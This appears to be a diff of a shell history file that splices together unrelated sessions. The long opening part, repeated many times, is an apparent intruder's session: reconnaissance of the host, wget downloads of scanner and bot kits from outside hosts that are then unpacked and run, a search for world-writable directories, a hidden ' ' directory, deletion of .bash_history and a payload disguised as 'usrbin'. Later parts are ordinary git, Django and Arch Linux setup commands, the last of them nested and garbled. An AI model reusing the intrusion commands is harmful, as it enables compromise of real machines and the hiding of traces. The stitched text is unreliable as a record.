+./configure +./bash +namp +nmap +cat /proc/cpuinfo +cat /etc/hosts +uname -a +w +wget gavana.uv.ro/scan.tgz +tar xzvf scan.tgz +./x 66.34 +reboot +wget gavana.uv.ro/f.tgz +tar xzvf f.tgz ;rm -rf f.tgz +./configure +vi +emacs +w +uname -a +/sbin/ifconfig +passwd +ls -a +ls -a +wget gavana.uv.ro/scan.tgz +ls -a +ps aux +locate mech +locate psy +wget gavana.uv.ro/ryo.tar.gz +tar xzvf ryo.tar.gz ;rm -rf ryo.tar.gz +rm -rf scripts/ +nmap +namp +nmap +cat /proc/cpuinfo +cat /etc/hosts +uname -a +w +wget gavana.uv.ro/scan.tgz +tar xzvf scan.tgz +./x 66.34 +reboot +wget gavana.uv.ro/f.tgz +tar xzvf f.tgz ;rm -rf f.tgz +./configure +./bash +namp +nmap +cat /proc/cpuinfo +cat /etc/hosts +uname -a +w +wget gavana.uv.ro/scan.tgz +tar xzvf scan.tgz +./x 66.34 +reboot +wget gavana.uv.ro/f.tgz +tar xzvf f.tgz ;rm -rf f.tgz +./configure +vi +emacs +w +uname -a +/sbin/ifconfig +passwd +ls -a +ls -a +wget gavana.uv.ro/scan.tgz +ls -a +ps aux +locate mech +locate psy +wget gavana.uv.ro/ryo.tar.gz +tar xzvf ryo.tar.gz ;rm -rf ryo.tar.gz +rm -rf scripts/ +nmap +namp +nmap +cat /proc/cpuinfo +cat /etc/hosts +uname -a +w +wget gavana.uv.ro/scan.tgz +tar xzvf scan.tgz +./x 66.34 +reboot +wget gavana.uv.ro/f.tgz +tar xzvf f.tgz ;rm -rf f.tgz +./configure +./bash +namp +nmap +cat /proc/cpuinfo +cat /etc/hosts +uname -a +w +wget gavana.uv.ro/scan.tgz +tar xzvf scan.tgz +./x 66.34 +reboot +wget gavana.uv.ro/f.tgz +tar xzvf f.tgz ;rm -rf f.tgz +./configure +vi +emacs +w +uname -a +/sbin/ifconfig +passwd +ls -a +ls -a +wget gavana.uv.ro/scan.tgz +ls -a +ps aux +locate mech +locate psy +wget gavana.uv.ro/ryo.tar.gz +tar xzvf ryo.tar.gz ;rm -rf ryo.tar.gz +rm -rf scripts/ +nmap +namp +nmap +cat /proc/cpuinfo +cat /etc/hosts +uname -a +w +wget gavana.uv.ro/scan.tgz +tar xzvf scan.tgz +./x 66.34 +reboot +wget gavana.uv.ro/f.tgz +tar xzvf f.tgz ;rm -rf f.tgz +./configure +./bash +namp +nmap +cat /proc/cpuinfo +cat /etc/hosts +uname -a +w +wget gavana.uv.ro/scan.tgz +tar xzvf scan.tgz +./x 66.34 +reboot +wget gavana.uv.ro/f.tgz +tar xzvf f.tgz ;rm -rf f.tgz +./configure +vi +emacs +w +uname -a +/sbin/ifconfig +passwd +ls -a +ls -a +wget gavana.uv.ro/scan.tgz +ls -a +ps aux +locate mech +locate psy +wget gavana.uv.ro/ryo.tar.gz +tar xzvf ryo.tar.gz ;rm -rf ryo.tar.gz +rm -rf scripts/ +nmap +namp +nmap +cat /proc/cpuinfo +cat /etc/hosts +uname -a +w +wget gavana.uv.ro/scan.tgz +tar xzvf scan.tgz +./x 66.34 +reboot +wget gavana.uv.ro/f.tgz +tar xzvf f.tgz ;rm -rf f.tgz +./configure +./bash +namp +nmap +cat /proc/cpuinfo +cat /etc/hosts +uname -a +w +wget gavana.uv.ro/scan.tgz +tar xzvf scan.tgz +./x 66.34 +reboot +wget gavana.uv.ro/f.tgz +tar xzvf f.tgz ;rm -rf f.tgz +./configure +vi +emacs +w +uname -a +/sbin/ifconfig +passwd +ls -a +ls -a +wget gavana.uv.ro/scan.tgz +ls -a +ps aux +locate mech +locate psy +wget gavana.uv.ro/ryo.tar.gz +tar xzvf ryo.tar.gz ;rm -rf ryo.tar.gz +rm -rf scripts/ +nmap +namp +nmap +cat /proc/cpuinfo +cat /etc/hosts +uname -a +w +wget gavana.uv.ro/scan.tgz +tar xzvf scan.tgz +./x 66.34 +reboot +wget gavana.uv.ro/f.tgz +tar xzvf f.tgz ;rm -rf f.tgz +./configure +./bash +namp +nmap +cat /proc/cpuinfo +cat /etc/hosts +uname -a +w +wget gavana.uv.ro/scan.tgz +tar xzvf scan.tgz +./x 66.34 +reboot +wget gavana.uv.ro/f.tgz +tar xzvf f.tgz ;rm -rf f.tgz +./configure +vi +emacs +w +uname -a +/sbin/ifconfig +passwd +ls -a +ls -a +wget gavana.uv.ro/scan.tgz +ls -a +ps aux +locate mech +locate psy +wget gavana.uv.ro/ryo.tar.gz +tar xzvf ryo.tar.gz ;rm -rf ryo.tar.gz +rm -rf scripts/ +nmap +namp +nmap +cat /proc/cpuinfo +cat /etc/hosts +uname -a +w +wget gavana.uv.ro/scan.tgz +tar xzvf scan.tgz +./x 66.34 +reboot +wget gavana.uv.ro/f.tgz +tar xzvf f.tgz ;rm -rf f.tgz +./configure +./bash +namp +nmap +cat /proc/cpuinfo +cat /etc/hosts +uname -a +w +wget gavana.uv.ro/scan.tgz +tar xzvf scan.tgz +./x 66.34 +reboot +wget gavana.uv.ro/f.tgz +tar xzvf f.tgz ;rm -rf f.tgz +./configure +vi +emacs +w +uname -a +/sbin/ifconfig +passwd +ls -a +ls -a +wget gavana.uv.ro/scan.tgz +ls -a +ps aux +locate mech +locate psy +wget gavana.uv.ro/ryo.tar.gz +tar xzvf ryo.tar.gz ;rm -rf ryo.tar.gz +rm -rf scripts/ +nmap +namp +nmap +cat /proc/cpuinfo +cat /etc/hosts +uname -a +w +wget gavana.uv.ro/scan.tgz +tar xzvf scan.tgz +./x 66.34 +reboot +wget gavana.uv.ro/f.tgz +tar xzvf f.tgz ;rm -rf f.tgz +./configure +./bash +namp +nmap +cat /proc/cpuinfo +cat /etc/hosts +uname -a +w +wget gavana.uv.ro/scan.tgz +tar xzvf scan.tgz +./x 66.34 +reboot +wget gavana.uv.ro/f.tgz +tar xzvf f.tgz ;rm -rf f.tgz +./configure +vi +emacs +w +uname -a +/sbin/ifconfig +passwd +ls -a +ls -a +wget gavana.uv.ro/scan.tgz +ls -a +ps aux +locate mech +locate psy +wget gavana.uv.ro/ryo.tar.gz +tar xzvf ryo.tar.gz ;rm -rf ryo.tar.gz +rm -rf scripts/ +nmap +namp +nmap +cat /proc/cpuinfo +cat /etc/hosts +uname -a +w +wget gavana.uv.ro/scan.tgz +tar xzvf scan.tgz +./x 66.34 +reboot +wget gavana.uv.ro/f.tgz +tar xzvf f.tgz ;rm -rf f.tgz +./configure +./bash +namp +nmap +cat /proc/cpuinfo +cat /etc/hosts +uname -a +w +wget gavana.uv.ro/scan.tgz +tar xzvf scan.tgz +./x 66.34 +reboot +wget gavana.uv.ro/f.tgz +tar xzvf f.tgz ;rm -rf f.tgz +./configure +vi +emacs +w +uname -a +/sbin/ifconfig +passwd +ls -a +ls -a +wget gavana.uv.ro/scan.tgz +w +uname -a +/sbin/ifconfig +passwd +ls -a +ls -a +wget gavana.uv.ro/scan.tgz +ls -a +ps aux +locate mech +locate psy +wget gavana.uv.ro/ryo.tar.gz +tar xzvf ryo.tar.gz ;rm -rf ryo.tar.gz +rm -rf scripts/ +nmap +namp +nmap +cat /proc/cpuinfo +cat /etc/hosts +uname -a +w +wget gavana.uv.ro/scan.tgz +tar xzvf scan.tgz +./x 66.34 +ls -a +rm -rf * +ls -a +find / -type d -perm -o+w 2> /dev/null +ls -a +ls -a +ls -a +ps -x +cat mech.set +ls -a +rm -rf c +ls -a +rm -rf * +ls -a +mkdr " " +mkdir " " +ls -a +ls -a +ls -a +rm -rf .bash_history +wget www.members.lycos.co.uk/sck8erel/copils.tgz;tar zxvf copils.tgz; cd " " ;rm -rf copils.tgz; mv bash usrbin ; chmod +x usrbin; PATH=:PATH ;usrbin +usrbin +ls +sudo rm -rf Outlook +cls +git status +git branch -D claudius-dev +lgit branch +git branch +cls +cls +git status +git status +cls +git branch +cls +git status +git log +git stash +git checkout a1baf7dadbf666ff173c5ab623cce3c8410eecfb +git status +git log +cls +git log +git status +git checkout clmb/archive +git status +git log +git reset --hard a1baf7dadbf666ff173c5ab623cce3c8410eecfb +git status +git log +git status +git add . +git commit -am "added hasArchiveFolder flag, created modal alert if archive folder doesn't exist" +git status +git status +git status +git commit -am "simplified code" +git status +git log +git push bitbucket +git config --global push.default matching + +git config --global push.default simple +git push bitbucket + git push --set-upstream bitbucket clmb/archive +git status +git stash list +git stash clear +git stash list +git branch +git checkout watch/prototype +git pull +cls +git stauts +git status +git checkout -b clmb/proto +open . +git status +git branch +rm -rf Outlook_scratchpad/ +cp Outlook/ outlook_sp/ +cp -h +mv Outlook\ 2/ Outlook2 +git branch +rm -rf Outlook2 +cls +git branch +open . +git branch +git status +cls +git status +git add app-ios/app-ios\ WatchOS\ App/Base.lproj/Interface.storyboard +git update-index --assume-unchanged app-ios/app-ios.xcodeproj/project.pbxproj +git status +git commit -m "added minimal hub UI and class" +git status +git status +git add "app-ios/app-ios WatchOS App/Base.lproj/Interface.storyboard" +git commit -m "updated min hub" +git status +git add . +git commit -am "stripped down hub interface to minimal code for prototype" +git branch --contains 1dcc4e +git status +git commit -am "cleaned up hub minial controller code" +git branch +git log clmb/mailCalview +git log +git log clmb/mailCalview +cls +git branch -D clmb/mailcalview +git branch +git locg clmb/noaccounts +git log clmb/noaccounts +git log clmb/noacct +git log clmb/noaccts +git branch -D clmb/noaccounts +git branch +cls +git status +git commit -am "updated mail and cal UI" +git status +git diff app-ios/Pods/resources-to-copy-app-ios.txt +git diff "app-ios/Pods/resources-to-copy-app-ios.txt" +git status +git status +git add "app-ios/app-ios WatchOS App Extension/CalListInterfaceController.swift" +git add "app-ios/app-ios WatchOS App Extension/MailListInterfaceController.swift" +git add "app-ios/app-ios WatchOS App Extension/MailRowController.swift" +git status +git commit -am "removed 'Load More' controller" +git diff app-ios/app-ios WatchOS App/Base.lproj/Interface.storyboard +git diff "app-ios/app-ios WatchOS App/Base.lproj/Interface.storyboard" +git status +git status +git log +cls +git status +git checkout clmb/archive +git rm --cached "app-ios/app-ios.xcodeproj/project.pbxproj" +git status +git reset "app-ios/app-ios.xcodeproj/project.pbxproj" +git statius +git status +git add . +git commit -m 're-added project file tracking new files/classes" +git commit -m 're-added project file tracking new files/classes' +git status +git checkout clmb/archive +git status +git commit -m "localized 'archive' string" +git commit -am "localized 'archive' string" +git push bitbucket +git status +git checkout clmb/proto +git status +git status +git git status +git status +git checkout clmb/localize +git status +git add . +git commit -m "updated archive localize string per Vignesh" +git push bitbucket +git statu +git status +git commit -am "tiny change to archive string" +git push +git status +git checkout clmb/proto +git status +git commit -am "cleaned up MailList code" +git merge clmb/localize +git log +cls +swift +cls +git status +git status +git status +git add "app-ios/app-ios WatchOS App Extension/ComplicationController.swift" +git commit -m "fixed bug introduced in complications" +git status +git status +git add . +git commit -m "finished minimal hub and mail/cal list intergration" +git status +git push --set-upstream bitbucket +git push --set-upstream bitbucket clm/proto + git push --set-upstream bitbucket clmb/proto +git status +git pull watch/prototype +git checkout watch/prototype +git pull +git checkout clmb/proto +git merge watch/prototype +open "app-ios/app-ios WatchOS App Extension/ComplicationController.swift" +git status +git status +git diff "app-ios/OutlookUI/NSString+Date.swift" +open app-ios/OutlookUI/NSString+Date.swift +git status +git checkout "app-ios/OutlookUI/NSString+Date.swift" +git status +git checkout develop +git rm --cached "app-ios/app-ios/AuthenticationVCFactory.swift" +git rm --cached "app-ios/app-ios/Views/Meeting Detail/MeetingDetailsView.swift" +git status +git add "app-ios/app-ios/AuthenticationVCFactory.swift" +cat .gitignore +cls +git status +git status +git update-index --assume-unchanged "app-ios/app-ios/AuthenticationVCFactory.swift" +git update-index --assume-unchanged "app-ios/app-ios/Views/Meeting Detail/MeetingDetailsView.swift" +git status +git checkout develop +git rm --cached "app-ios/app-ios/AuthenticationVCFactory.swift" +git rm --cached "app-ios/app-ios/Views/Meeting Detail/MeetingDetailsView.swift" +git status +git stash +git status +git checkout develop +git pull +git pull bitbucket +git pull bitbucket develop +git statsu +git status +git checkout clmb/protoype +git checkout clmb/proto +git merge develop +git log +c;s +cls +git reset --hard f26af7562de3cc21050dacebf2048abbb0082856 +git status +git checkout watch/prototype +git pull +cls +git checkout clmb/proto +git log +cls +git checkout develop +git checkout watch/prototype +git merge develop +open app-ios/app-ios/Strings/da.lproj/Localizable.strings +open app-ios/app-ios/Controllers/MessageList/MessageListVC.h +open app-ios/app-ios/Controllers/Authentication/OutlookRestOAuthVC.m +open app-ios/app-ios/AppDelegate.m +open app-ios/app-ios.xcodeproj/project.pbxproj +open app-ios/OutlookUI/O365TokenManager.swift +open app-ios/LocalizedStringKit/zu.lproj/LocalizedStringKit.strings +open app-ios/LocalizedStringKit/zh-Hant.lproj/LocalizedStringKit.strings +open app-ios/LocalizedStringKit/zh-Hans.lproj/LocalizedStringKit.strings +open app-ios/LocalizedStringKit/vi.lproj/LocalizedStringKit.strings +open app-ios/LocalizedStringKit/ur-PK.lproj/LocalizedStringKit.strings +open app-ios/LocalizedStringKit/uk.lproj/LocalizedStringKit.strings +open app-ios/LocalizedStringKit/tr.lproj/LocalizedStringKit.strings +open app-ios/LocalizedStringKit/th.lproj/LocalizedStringKit.strings +open app-ios/LocalizedStringKit/te.lproj/LocalizedStringKit.strings +open app-ios/LocalizedStringKit/ta.lproj/LocalizedStringKit.strings +open app-ios/LocalizedStringKit/sw.lproj/LocalizedStringKit.strings +open app-ios/LocalizedStringKit/sv.lproj/LocalizedStringKit.strings +open app-ios/LocalizedStringKit/sl.lproj/LocalizedStringKit.strings +open app-ios/LocalizedStringKit/sk.lproj/LocalizedStringKit.strings +open app-ios/LocalizedStringKit/ru.lproj/LocalizedStringKit.strings +open app-ios/LocalizedStringKit/ro.lproj/LocalizedStringKit.strings +open app-ios/LocalizedStringKit/pt.lproj/LocalizedStringKit.strings app-ios/LocalizedStringKit/pt-PT.lproj/LocalizedStringKit.strings app-ios/LocalizedStringKit/pl.lproj/LocalizedStringKit.strings +open app-ios/LocalizedStringKit/nl.lproj/LocalizedStringKit.strings app-ios/LocalizedStringKit/nb.lproj/LocalizedStringKit.strings app-ios/LocalizedStringKit/ms.lproj/LocalizedStringKit.strings app-ios/LocalizedStringKit/mr.lproj/LocalizedStringKit.strings app-ios/LocalizedStringKit/ml.lproj/LocalizedStringKit.strings app-ios/LocalizedStringKit/lv.lproj/LocalizedStringKit.strings app-ios/LocalizedStringKit/lt.lproj/LocalizedStringKit.strings app-ios/LocalizedStringKit/ko.lproj/LocalizedStringKit.strings app-ios/LocalizedStringKit/kn.lproj/LocalizedStringKit.strings app-ios/LocalizedStringKit/ja.lproj/LocalizedStringKit.strings app-ios/LocalizedStringKit/it.lproj/LocalizedStringKit.strings app-ios/LocalizedStringKit/is.lproj/LocalizedStringKit.strings app-ios/LocalizedStringKit/id.lproj/LocalizedStringKit.strings app-ios/LocalizedStringKit/hu.lproj/LocalizedStringKit.strings app-ios/LocalizedStringKit/hr.lproj/LocalizedStringKit.strings app-ios/LocalizedStringKit/hi.lproj/LocalizedStringKit.strings app-ios/LocalizedStringKit/he.lproj/LocalizedStringKit.strings app-ios/LocalizedStringKit/gu.lproj/LocalizedStringKit.strings app-ios/LocalizedStringKit/gl.lproj/LocalizedStringKit.strings app-ios/LocalizedStringKit/ga.lproj/LocalizedStringKit.strings app-ios/LocalizedStringKit/fr.lproj/LocalizedStringKit.strings app-ios/LocalizedStringKit/fr-CA.lproj/LocalizedStringKit.strings app-ios/LocalizedStringKit/fil.lproj/LocalizedStringKit.strings app-ios/LocalizedStringKit/fi.lproj/LocalizedStringKit.strings app-ios/LocalizedStringKit/fa.lproj/LocalizedStringKit.strings app-ios/LocalizedStringKit/eu.lproj/LocalizedStringKit.strings app-ios/LocalizedStringKit/et.lproj/LocalizedStringKit.strings app-ios/LocalizedStringKit/es.lproj/LocalizedStringKit.strings app-ios/LocalizedStringKit/es-MX.lproj/LocalizedStringKit.strings app-ios/LocalizedStringKit/en.lproj/LocalizedStringKit.strings app-ios/LocalizedStringKit/el.lproj/LocalizedStringKit.strings app-ios/LocalizedStringKit/de.lproj/LocalizedStringKit.strings app-ios/LocalizedStringKit/da.lproj/LocalizedStringKit.strings app-ios/LocalizedStringKit/cs.lproj/LocalizedStringKit.strings app-ios/LocalizedStringKit/ca.lproj/LocalizedStringKit.strings app-ios/LocalizedStringKit/bn-BD.lproj/LocalizedStringKit.strings app-ios/LocalizedStringKit/bg.lproj/LocalizedStringKit.strings app-ios/LocalizedStringKit/ar.lproj/LocalizedStringKit.strings app-ios/LocalizedStringKit/af.lproj/LocalizedStringKit.strings +open app-ios/AnalyticsKit/AnalyticsSyncLogger.swift app-ios/AnalyticsKit/AnalyticsSearchSessionLogger.swift app-ios/AnalyticsKit/AnalyticsEmailComposeLogger.swift AcompliKit/common/ACEngine/Network/ACSyncInbound.m +open AcompliKit/common/ACEngine/Network/ACSyncInbound.m +git status +git branch +bspec DEV +git status +git commit -am "fixed merge conflicts" +cls +git status +git branch +git merge clmb/proto +open app-ios/app-ios.xcodeproj/project.pbxproj +git status +open app-ios/app-ios.xcodeproj/project.pbxproj +git commit -am "finxed merge conflicts" +git status +git push bitbucket watch/prototype +git status +cls +git branch +git status +git update-index --assume-unchanged "app-ios/app-ios/AuthenticationVCFactory.swift" +git update-index --assume-unchanged "app-ios/app-ios/MeetingInvitationVC.swift" +git update-index --assume-unchanged "app-ios/app-ios/Views/Meeting Detail/MeetingDetailsView.swift" +git status +git status +git commit -am "updated storybaord and CalList" +git push bitbucket +git status +git commit -am "hide newMailIcon by default" +git push bitbucket +git status +git commit -am 'fixed setTitle issue' +git push +ls +ls +ls +ls -a +ls -a +cat .gitignore +qcls +cls +ls -a +ls +cat build.sh +ls +./app-ios/build.sh WIP +swift --version +git status +exit +cat .aliases +nano .aliases +nano .aliases +ls +git clone git@github.com:tutsplus/Xcode-ViewDebugging.git +open . +cls +exit +rm * +rm * +gdb +brew install gdb +swift +rm * +exit +rm '[kat.cr]kung.fu.panda.3.2016.hc.hdrip.xvid.ac3.evo.torrent' +rm '[kat.cr]tutsplus.watchos.2.from.scratch.torrent' +rm vlc-2.2.2.dmg +rm '[kat.cr]ip.man.3.2015.720p.brrip.x264.chinese.aac.etrg.torrent' +rm javaforosx.dmg +rm jdk-8u73-macosx-x64.dmg +rm * +cls +rm eclipse-inst-mac64.tar.gz +rm '[kat.cr]tutsplus.agile.design.patterns.2012.torrent' +rm Go2Shell.dmg +rm RescueTimeInstaller.dmg +rm BitTorrent.dmg +exit +find swift +where swift +find Documents +cls +where mk +where mv +locate mv + sudo launchctl load -w /System/Library/LaunchDaemons/com.apple.locate.plist +cls +ls +cp swift swift.old +sudo cp swift swift.old +open . +exit +cp swift swift.old +sudo cp swift swift.old +ls +grep swift.old +ls | grep swift.old +ls swfit +ls swiftls +ls -l +ls -l swift +chmod 777 swift +exit +ls +mv swift /usr/bin/ +sudo mv swift /usr/bin/ +exit +rm -rf Kung.Fu.Panda.3.2016.HC.HDRip.XviD.AC3-EVO/ +rm Ex_Files_FoP_Design_Pat_Free.zip +rm Ex_Files_* +cls +rm Screen\ Shot\ * +rm *.jpg +ls +rm *.pkg +ls +rm *.dmg +cls +ls +sh -c "$(curl -fsSLssell/oh-my-zsh/master/tools/install.sh)" +exit +ls +git status +git pull +xcrun swift --version +find repl_swift +open . +git branch +git log +cls +git branch +git merge clmb/archive +open app-ios/app-ios WatchOS App Extension/WatchExtensionContants.swift +ope "app-ios/app-ios WatchOS App Extension/WatchExtensionContants.swift" +open "app-ios/app-ios WatchOS App Extension/WatchExtensionContants.swift" +git commit -am "fixed merge from archive" +git merge clmb/noaccts +open app-ios/app-ios/Strings/en.lproj/Localizable.strings "app-ios/app-ios WatchOS App Extension/en.lproj/WatchLocalizable.strings" "app-ios/app-ios WatchOS App Extension/InterfaceController.swift" "app-ios/app-ios WatchOS App Extension/GlanceController2.swift" "app-ios/app-ios WatchOS App Extension/ComplicationController.swift" +git status +git commit -am "fixed merge conflicts from clmb/noaccts" +open . +git status +git branch +git status +git log +cls +git diff clmb/noaccts +cls +git branch +git merge clmb/noaccts +git status +git status +git commit -am "fixed code break" +git status +git checkout clmb/noaccts +git rm --cached "app-ios/app-ios/AuthenticationVCFactory.swift" +git rm --cached "app-ios/app-ios/MeetingInvitationVC.swift" +git status +git stash +git stash list +git checkout clmb/noaccts +git status +git checkout watch/prototype +git log +git reset --hard a7830c971f90f5b7bb0c199159c1102ba241ef0a +cls +git log +git status +git commit -am "updated mail controller to build and populate rows together" +git status +git commit -am "updated Hub to remove old checkAccounts code" +git merge clmb/noaccts +open app-ios/app-ios/Strings/en.lproj/Localizable.strings "app-ios/app-ios WatchOS App Extension/en.lproj/WatchLocalizable.strings" "app-ios/app-ios WatchOS App Extension/InterfaceController.swift" "app-ios/app-ios WatchOS App Extension/GlanceController2.swift" "app-ios/app-ios WatchOS App Extension/ComplicationController.swift" +git status +git commit -am "fixed merge conflicts from clmb/noaccts" +cls +git status +git status +git stash +git stash list +git stash drop stash@{0} +git stash list +git status +open . +git pull +git push bitbucket +git status +./app-ios/build.sh +./app-ios/build.sh WIP +cls +git status +git branch -a +git branch +git checkout sedorosh/watch_develop_03_10 +git pull +cls +git branch +git checkout clmb/schedule +git checkout -b clmb/schedule +bspec DEV +git status +git branch +git update-index --assume-unchanged "app-ios/app-ios/AuthenticationVCFactory.swift" +git update-index --assume-unchanged "app-ios/app-ios/MeetingInvitationVC.swift" +git status +git update-index --assume-unchanged "app-ios/app-ios.xcodeproj/project.pbxproj" +git status +cls +git status +git status +exit +swift --version +which swift +diff +diff -h +diff --help +cls +diff ~/Desktop/swift-2.2 /usr/bin/swift +cls +exit +sudo +ls +ls +ls +ls +sudo./vmware-install.pl.-d +sudo ./vmware-install.pl.-d +sudo ./vmware-install .pl.-d +sudo ./vmware-install.pl .-d +ls +ls +ls +sudo ./vmware-install.pl -d +y +exit +sudo apt-get update +ls +ls +ls vmware-tools-distrib +sudo ./vmware-install.pl -d +ls +sudo ./vmware-install.pl -d +no +sudo ./vmware-install.pl -d +ls +ls +tar -xyzf VMwareTools-10.2.5-8068393.tar.gz +ls +ls +tar xvzf VMwareTools-10.2.5-8068393.tat.gz +tar xvzf VMwareTools-10.2.5-8068393.tar.gz +ls +ls +sudo ./vmware-install.pl +exit +sudo apt-get update +whoami +pwd +2+2 +f +exit +ls +ls +source myvenv/bin/activate +exit +source myvenv/bin/activate +ls +linux +ls +python manage.py startapp blog +python manage.py makemigrations blog +python manage.py migrate blog +python manage.py createsuperuser +git add --all . +git commit -m "Mi aplicación Django Girls, primer commit" +git status +git remote add originst-blog2019.git +git push -u origin master +sudo apt install git +git init +git config --global user.name "Tu nombre" +git config --global user.name "Micaelachavez" +git config --global user.email micaela.chavez2909@gmail.com +mkdir micaela +ls +pip install -r requirements.txt +sudo apt install python-pip +pytho3 +ls +ls +python3 ejemplo.py +mkdir djangogirls +ls +ls +python3 -m venv myvenv +python3-m venv myvenv +python3 -m venv myvenv +apt-get install python3-venv +sudo apt-get install python3-venv +python3 -m venv myvenv +ls +ls +source myvenv/bin/activate +source myvenv/bin/activate +python -m pip install --upgrade pip +pip install -r requirements.txt +linux +ls +linux +ls +pip install -r requirements.txt +django-admin startproject mysite . +python manage.py migrate +python manage.py runserver +python manage.py runserver. +python manage.py runserver +git status +python manage.py runserver +ls +djangogirls +python manage.py runserver +ls +ls +python manage.py runserver +git init +git config --global user.name "Micaelachavez" +git config --global user.email micaaela.chavez2909@gmail.com +git status +git add --all . +git commit -m "Mi aplicación Django Girls, primer commit" +git remote add origin +git init +git add README.md +git commit -m "first commit" +git init +git add README.md +git remote add origin +source myvenv/bin/activate +python -m pip install --upgrade pip +pip install -r requirements.txt +python -m pip install -U --force-reinstall pip +ls +django-admin startproject mysite . +python manage.py migrate +python manage.py runserver +python manage.py startapp blog +python manage.py makemigrations blog +python manage.py migrate blog +python manage.py runserver +python manage.py createsuperuse +python manage.py createsuperuser +git remote add origin +python manage.py createsuperuser +git remote add destino + +git remote add destino +git push -u destino master +git status +pacman -S xfce4 +useradd toeknee +userdel toeknee +useradd -c ÃÃ"Ánthony Karnowski" -u 999 -d /home/toeknee/ toeknee +useradd -c ÃÃ"Ánthony Karnowski" -u 99 -d /home/toeknee/ toeknee +useradd -c ÃÃ"Ánthony Karnowski" -u 99 -d /home/toeknee/ toeknee +useradd -c ÃÃ"Ánthony Karnowski" -u 999 -d /home/toeknee/ toeknee +useradd -c ÃÃ"Ánthony Karnowski" -u 9999 -d /home/toeknee/ toeknee +passwd toeknee +login +exec startxfce4 +mkdir /home/toeknee/ +chown toeknee:toeknee /home/toeknee +logout +pacman -S mousepad +thunar +nano /etc/systemd/getty@tty1.service.d/ +mkdir /etc/systemd/getty@tty1.service.d/ +mkdir /etc/systemd//system/getty@tty1.service.d/ +nano /etc/systemd//system/getty@tty1.service.d/autologin.conf +pacman -S xfce4-extras +pacman -S xfce4-extra +pacman -S xfce4 +mousepad +sudo adduser toeknee sudo +pacman -S sudo +sudo adduser toeknee sudo +nano /etc/sudoers +userdel vagrant +nano /etc/systemd/system/getty@tt1.service.d/autologin.conf +nano /etc/systemd/system/getty@tty1.service.d/autologin.conf +pacman -S agetty +pacman -S getty +login +chown toeknee:toeknee /home/toeknee +logout +chown toeknee:toeknee /home/toeknee/.bashrc +nano /etc/locale.conf +locale.gen +locale-gen +reboot +exec startxfce4 +exec startxfce4 +logout +exec startxfce4 +sudo echo '#something' > /etc/systemd/system/getty@tty1.service.d/autologin.conf +sudo echo '#something /n nothing' > /etc/systemd/system/getty@tty1.service.d/autologin.conf +sudo echo '#something + nothing' > /etc/systemd/system/getty@tty1.service.d/autologin.conf +sudo printf '#something + nothing' > /etc/systemd/system/getty@tty1.service.d/autologin.conf +sudo printf '[Service] +ExecStart= +ExecStart=-/sbin/agetty --autologin toeknee --noclear %I 38400 linux ' > /etc/systemd/system/getty@tty1.service.d/autologin.conf +sudo printf "[Service] +ExecStart= +ExecStart=-/sbin/agetty --autologin toeknee --noclear %I 38400 linux" > /etc/systemd/system/getty@tty1.service.d/autologin.conf +sudo printf "[Service] +ExecStart= +ExecStart=-/sbin/agetty --autologin toeknee --noclear '%I' 38400 linux" > /etc/systemd/system/getty@tty1.service.d/autologin.conf +sudo printf "[Service] +ExecStart= +ExecStart=-/sbin/agetty --autologin toeknee --noclear %I 38400 linux" > /etc/systemd/system/getty@tty1.service.d/autologin.conf +sudo printf "[Service] +ExecStart= +ExecStart=-/sbin/agetty --autologin toeknee --noclear'%'I 38400 linux" > /etc/systemd/system/getty@tty1.service.d/autologin.conf +sudo printf "[Service] +ExecStart= +ExecStart=-/sbin/agetty --autologin toeknee --noclear I 38400 linux" > /etc/systemd/system/getty@tty1.service.d/autologin.conf +sudo fprintf "[Service] +ExecStart= +ExecStart=-/sbin/agetty --autologin toeknee --noclear %I 38400 linux" > /etc/systemd/system/getty@tty1.service.d/autologin.conf +sudo printf "[Service] +ExecStart= +ExecStart=-/sbin/agetty --autologin toeknee --noclear %%I 38400 linux" > /etc/systemd/system/getty@tty1.service.d/autologin.conf +# +# ~/.bash_profile +# +[[ -f ~/.bashrc ]] && . ~/.bashrc +sudo printf "# +# ~/.bash_profile +# +[[ -f ~/.bashrc ]] && . ~/.bashrc +startx" > /home/toeknee/.bash_profile +printf "#sudo printf "# +# ~/.bash_profile +# +[[ -f ~/.bashrc ]] && . ~/.bashrc +startx" > /home/toeknee/.bash_profile/bin/sh +# +# ~/.xinitrc +# +# Executed by startx (run your window manager from here) + +if [ -d /etc/X11/xinit/xinitrc.d ]; then + for f in /etc/X11/xinit/xinitrc.d/*; do + [ -x "$f" ] && . "$f" + done + unset f +fi + +#exec gnome-session +#exec startkde +#Launches My Chosen Window Manager + +printf "#printf "#sudo printf "# +# ~/.bash_profile +# +[[ -f ~/.bashrc ]] && . ~/.bashrc +startx" > /home/toeknee/.bash_profile/bin/sh +# +# ~/.xinitrc +# +# Executed by startx (run your window manager from here) + +if [ -d /etc/X11/xinit/xinitrc.d ]; then + for f in /etc/X11/xinit/xinitrc.d/*; do + [ -x "$f" ] && . "$f" + done + unset f +fi + +#exec gnome-session +#exec startkde +#Launches My Chosen Window Manager +/bin/sh +# +# ~/.xinitrc +# +# Executed by startx (run your window manager from here) + +if [ -d /etc/X11/xinit/xinitrc.d ]; then + for f in /etc/X11/xinit/xinitrc.d/*; do + [ -x "$f" ] && . "$f" + done + unset f +fi + +#exec gnome-session +#exec startkde +#Launches My Chosen Window Manager +exec startxfce4" > /home/toeknee/.bash_profile +printf "#printf "#printf "#sudo printf "# +# ~/.bash_profile +# +[[ -f ~/.bashrc ]] && . ~/.bashrc +startx" > /home/toeknee/.bash_profile/bin/sh +# +# ~/.xinitrc +# +# Executed by startx (run your window manager from here) + +if [ -d /etc/X11/xinit/xinitrc.d ]; then + for f in /etc/X11/xinit/xinitrc.d/*; do + [ -x "$f" ] && . "$f" + done + unset f +fi + +#exec gnome-session +#exec startkde +#Launches My Chosen Window Manager +/bin/sh +# +# ~/.xinitrc +# +# Executed by startx (run your window manager from here) + +if [ -d /etc/X11/xinit/xinitrc.d ]; then + for f in /etc/X11/xinit/xinitrc.d/*; do + [ -x "$f" ] && . "$f" + done + unset f +fi + +#exec gnome-session +#exec startkde +#Launches My Chosen Window Manager +exec startxfce4" > /home/toeknee/.bash_profile/bin/sh +# +# ~/.xinitrc +# +# Executed by startx -run your window manager from here + +if [ -d /etc/X11/xinit/xinitrc.d ]; then + for f in /etc/X11/xinit/xinitrc.d/*; do + [ -x "$f" ] && . "$f" + done + unset f +fi + +#exec gnome-session +#exec startkde +#Launches My Chosen Window Manager +exec startxfce4" > /home/toeknee/.bash_profile + +printf "#printf "#printf "#sudo printf "# +# ~/.bash_profile +# +[[ -f 